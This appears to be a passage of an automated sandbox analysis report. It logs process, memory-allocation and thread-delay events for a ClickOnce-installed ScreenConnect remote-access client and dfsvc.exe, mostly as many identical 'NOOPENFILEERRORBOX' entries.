                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 27688670000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 276A1FE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 860000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1A420000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 16C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 2F30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 880000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 1200000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMemory allocated: 3200000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 2C00000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMemory allocated: 1AD30000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
